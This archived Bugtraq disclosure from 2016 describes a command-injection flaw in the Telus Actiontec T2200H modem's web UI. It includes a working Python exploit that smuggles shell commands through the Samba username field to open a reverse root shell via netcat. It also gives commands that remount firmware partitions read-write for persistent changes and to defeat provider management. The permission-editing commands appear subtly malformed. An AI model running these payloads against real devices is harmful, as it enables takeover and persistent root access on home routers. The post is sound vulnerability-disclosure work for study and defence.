| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAKA4ij9FDsiUn-5qHBcheP5Q3n1mjgEqSdNxmd+Uyr_S+A1bvQ@mail.gmail.com>
Date: Wed, 17 Aug 2016 18:05:31 -0600
From: Andrew Klaus <andrewklaus@...il.com>
To: bugtraq@...urityfocus.com
Subject: Telus Actiontec T2200H Modem Input Validation Flaw Allows Elevated
Shell Access
### Device Details
Vendor: Actiontec (Telus Branded)
Model: T2200H (but likely affecting other similar models of theirs)
Affected Firmware: T2200H-31.128L.03
Device Manual: http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manual.pdf
Reported: November 2015
Status: Fixed on T2200H-31.128L.07
CVE: Not needed since update is pushed by the provider.
The Telus Actiontec T2200H is Telus’ standard bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge
mode, 802.11agn wireless, etc.
### Summary of Findings
- root shell access can be obtained as long as an attacker has a login
to the web UI. The password can always be reset by knowing the device
serial number printed on the device, if the default password hasn't
been changed.
- There are 2 separate firmware partitions (/dev/mtdblock0 and
/dev/mtdblock1) that can be mounted read-write and then modified with
additional files or configuration - surviving reboots and factory
resets.
- TR-069 settings can be modified to not check in to the management
server. This means that future updates would be impossible without
flashing the device locally.
### Running single shell commands
Under Advanced Setup > Samba Configuration update either the Samba
Username or Password with the following: “;iptables -F”. A USB flash
drive needs to be plugged into the USB port on the rear of the modem
when running the exploit from the web GUI. Anything run in this field
is executed as the root user.
Now after running nmap, all listening ports are open:
$ nmap -p 1-10000 192.168.1.254
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-08 22:14 MST
Nmap scan report for 192.168.1.254
Host is up (0.016s latency).
Not shown: 9991 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
5431/tcp open park-agent
7547/tcp open unknown
### Obtaining reverse root shell
Create a netcat session locally: nc -k -l 5555
Next we’ll run the following python code to allow us to pipe /bin/sh
back to us. Before running the following python code, you will need to
login successfully to the web-ui through http://192.168.1.254.
192.168.1.9 is the IP of the machine listening on netcat.
```
import requests
s = requests.session()
smb_post = { "action" : "savapply",
"smbdEnable" : '1',
"smbdPasswd" : "123",
"smbdUserid" : ";rm /var/fifo2; mknod /var/fifo2 p",
"smbdVolume" : 'usb1_1',
"smbdWorkgroup" : "WORKGROUP"}
# creating the fifo pipe
s.post("http://192.168.1.254/fileshare.cmd", smb_post)
smb_post["smbdUserid"] = ";cat /var/fifo2 |/bin/sh -i 2>&1 |nc
192.168.1.9 5555 > /var/fifo2"
# Using the pipe to send a shell over netcat
s.post("http://192.168.1.254/fileshare.cmd", smb_post)
```
Your netcat listener should now be prompted with a root busybox shell:
$ nc -k -l 5555
BusyBox v1.17.2 (2013-12-27 18:49:15 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /etc/image_version
T2200H-311283BGW0011043
#
### Other Discoveries
Mounting root filesystem read+write:
`mount -t jffs2 -o remount,rw mtd:rootfs`
Mounting partition 2 read-write:
`mount -t jffs2 -o rw /dev/mtdblock1 /mnt`
To allow unrestricted access of the web features (enabling telnet,
firmware flash, TR-069 configuration, etc.)
After the root filesystem is mounted read-write:
```
cat /webs/perm.txt | sed ‘s/ 4/ 7/’ | /webs/perm.txt
cat /webs/perm2.txt | sed ‘s/ 4/ 7/’ | /webs/perm2.txt
killall -HUP httpd
```
Powered by blists - more mailing lists